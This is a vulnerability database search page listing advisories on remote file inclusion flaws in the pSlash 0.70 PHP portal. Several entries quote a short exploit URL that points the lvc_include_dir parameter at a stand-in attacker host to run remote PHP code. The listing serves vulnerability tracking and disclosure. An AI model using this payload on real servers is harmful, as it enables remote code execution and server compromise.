Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in
🔥 Daily Hot!
💪🏽 CPE Enhanced Advisories
🕶 Shadow Exploits
🕵🏼 Vulners CPE
🔐 Security news
💻 Exploit updates
📑 Blogs review
🐧 Linux vulnerabilities
🐞 Bugbounty
🤖 AI High Score
📰 CVE Feed
show all

20 matches found

EUVD
EUVDadded 2025/10/07 12:30 a.m.1 views

EUVD-2007-4995

Malware in sbrugna...

7.5CVSS6.4AI score0.00747EPSS
Exploits1References4
Check Point Advisories
Check Point Advisoriesadded 2014/02/03 12:0 a.m.4 views

PSlash Web Portal index.php Code Execution - Ver2 (CVE-2001-1235)

A code execution vulnerability has been reported in PSlash Web Portal. A remote attacker could trigger this vulnerability by including files from remote web sites using an HTTP request that modifies the includedir variable. Successful exploitation of this vulnerability could allow a remote attack...

2.8AI score0.01648EPSS
Exploits1
Check Point Advisories
Check Point Advisoriesadded 2014/01/07 12:0 a.m.1 views

PSlash Web Portal index.php Code Execution - Ver2 (CVE-2001-1235)

A code execution vulnerability has been reported in PSlash Web Portal. A remote attacker could trigger this vulnerability by including files from remote web sites using an HTTP request that modifies the includedir variable. Successful exploitation of this vulnerability could allow a remote attack...

7.5CVSS7.6AI score0.01648EPSS
Exploits1
Prion
Prionadded 2007/09/20 9:17 p.m.21 views

Remote file inclusion

Multiple PHP remote file inclusion vulnerabilities in pSlash 0.70 allow remote attackers to execute arbitrary PHP code via a URL in 1 the lvcadmindir parameter to modules/visitors2/admin/view-archiver.inc.php or 2 the lvcincludedir parameter to modules/visitors2/include/menus.inc.php. NOTE: the...

7.5CVSS7.9AI score0.1218EPSS
Exploits2References3Affected Software1
NVD
NVDadded 2007/09/20 9:17 p.m.8 views

CVE-2007-5014

Multiple PHP remote file inclusion vulnerabilities in pSlash 0.70 allow remote attackers to execute arbitrary PHP code via a URL in 1 the lvcadmindir parameter to modules/visitors2/admin/view-archiver.inc.php or 2 the lvcincludedir parameter to modules/visitors2/include/menus.inc.php. NOTE: the...

7.5CVSS7.6AI score0.00747EPSS
Exploits1References3
CVE
CVEadded 2007/09/20 9:0 p.m.41 views

CVE-2007-5014

CVE-2007-5014 concerns pSlash 0.70 with multiple PHP remote file inclusion vulnerabilities. The reported vectors allow an attacker to specify a URL for PHP code execution via (1) lvc_admin_dir in modules/visitors2/admin/view-archiver.inc.php and (2) lvc_include_dir in modules/visitors2/include/me...

7.5CVSS7.7AI score0.00747EPSS
Exploits1References3Affected Software1
Cvelist
Cvelistadded 2007/09/20 9:0 p.m.16 views

CVE-2007-5014

Multiple PHP remote file inclusion vulnerabilities in pSlash 0.70 allow remote attackers to execute arbitrary PHP code via a URL in 1 the lvcadmindir parameter to modules/visitors2/admin/view-archiver.inc.php or 2 the lvcincludedir parameter to modules/visitors2/include/menus.inc.php. NOTE: the...

7.6AI score0.00747EPSS
Exploits1References3
seebug.org
seebug.orgadded 2006/12/12 12:0 a.m.58 views

PSlash lvc_include_dir远程文件包含漏洞

PSlash是一款基于PHP的WEB应用程序。 PSlash不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'config.inc.php'脚本对用户提交的'lvcincludedir'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 Derek Leung pSlash 0.70 http://www.pslash.com/...

7.1AI score
Exploits0
Packet Storm
Packet Stormadded 2006/08/28 12:0 a.m.24 views

pslash07.txt

pSlash v0.7 lvcincludedir Remote Include Vulnerability Author: XORON Class: Remote cont@ct: x0r0nathotmaildotcom Code: require$lvcincludedir.'db/dbmysql.inc.php'; Exploit: http://www.site.com/path/modules/visitors2/include/config.inc.php?lvcincludedir=http://evilscripts? Greetz: str0ke, Ironfist,...

7.4AI score
Exploits0
NVD
NVDadded 2006/08/26 9:4 p.m.8 views

CVE-2006-4373

PHP remote file inclusion vulnerability in modules/visitors2/include/config.inc.php in pSlash 0.70 allows remote attackers to execute arbitrary PHP code via a URL in the lvcincludedir parameter...

7.5CVSS7.4AI score0.1218EPSS
Exploits1References7
Cvelist
Cvelistadded 2006/08/26 1:0 a.m.17 views

CVE-2006-4373

PHP remote file inclusion vulnerability in modules/visitors2/include/config.inc.php in pSlash 0.70 allows remote attackers to execute arbitrary PHP code via a URL in the lvcincludedir parameter...

7.4AI score0.1218EPSS
Exploits1References7
CVE
CVEadded 2006/08/26 1:0 a.m.37 views

CVE-2006-4373

CVE-2006-4373 describes a PHP remote file inclusion in pSlash 0.70. The vulnerability resides in modules/visitors2/include/config.inc.php, where an attacker can cause arbitrary PHP code execution by providing a URL in the lvc_include_dir parameter. This is part of a family of RFI issues for pSlas...

7.5CVSS7.5AI score0.1218EPSS
Exploits1References7Affected Software1
securityvulns
securityvulnsadded 2006/08/25 12:0 a.m.53 views

pSlash v0.7 (lvc_include_dir) Remote Include Vulnerability

pSlash v0.7 lvcincludedir Remote Include Vulnerability Author: XORON Class: Remote cont@ct: x0r0nathotmaildotcom Code: require$lvcincludedir.'db/dbmysql.inc.php'; Exploit: http://www.site.com/path/modules/visitors2/include/config.inc.php?lvcincludedir=http://evilscripts? Greetz: str0ke, Ironfist,...

0.6AI score
Exploits0
exploitpack
exploitpackadded 2006/08/23 12:0 a.m.49 views

pSlash 0.7 - lvc_include_dir Remote File Inclusion

pSlash 0.7 - lvcincludedir Remote File Inclusion pSlash v0.7 lvcincludedir Remote Include Vulnerability Author: XORON Class: Remote cont@ct: x0r0nathotmaildotcom Code: require$lvcincludedir.'db/dbmysql.inc.php'; Exploit:...

Exploits0
seebug.org
seebug.orgadded 2006/08/23 12:0 a.m.61 views

pSlash 0.7 (lvc_include_dir) Remote File Include Vulnerability

No description provided by source. pSlash v0.7 lvcincludedir Remote Include Vulnerability Author: XORON Class: Remote cont@ct: x0r0nathotmaildotcom Code: require$lvcincludedir.'db/dbmysql.inc.php'; Exploit:...

7.1AI score
Exploits0
0day.today
0day.todayadded 2006/08/23 12:0 a.m.57 views

pSlash 0.7 (lvc_include_dir) Remote File Include Vulnerability

Exploit for unknown platform in category web applications ============================================================== pSlash 0.7 lvcincludedir Remote File Include Vulnerability ============================================================== pSlash v0.7 lvcincludedir Remote Include Vulnerability...

7.1AI score
Exploits0
Exploit DB
Exploit DBadded 2006/08/23 12:0 a.m.55 views

pSlash 0.7 - 'lvc_include_dir' Remote File Inclusion

pSlash v0.7 lvcincludedir Remote Include Vulnerability Author: XORON Class: Remote cont@ct: x0r0nathotmaildotcom Code: require$lvcincludedir.'db/dbmysql.inc.php'; Exploit: http://www.site.com/path/modules/visitors2/include/config.inc.php?lvcincludedir=http://evilscripts? Greetz: str0ke, Ironfist,...

7.4AI score
Exploits0
Cvelist
Cvelistadded 2002/06/25 4:0 a.m.11 views

CVE-2001-1235

pSlash PHP script 0.7 and earlier allows remote attackers to execute arbitrary code by including files from remote web sites, using an HTTP request that modifies the includedir variable...

7.8AI score0.01648EPSS
Exploits1References4
CVE
CVEadded 2002/06/25 4:0 a.m.101 views

CVE-2001-1235

CVE-2001-1235 affects PSlash Web Portal (PHP script 0.7 and earlier). Affected component: index.php; vulnerability arises when an HTTP request modifies the includedir variable, allowing a remote attacker to include remote files and execute arbitrary code on the server. Documented impact is remote...

7.5CVSS7.8AI score0.01648EPSS
Exploits1References4Affected Software1
NVD
NVDadded 2001/10/02 4:0 a.m.4 views

CVE-2001-1235

pSlash PHP script 0.7 and earlier allows remote attackers to execute arbitrary code by including files from remote web sites, using an HTTP request that modifies the includedir variable...

7.5CVSS7.8AI score0.01648EPSS
Exploits1References4
Rows per page
Query Builder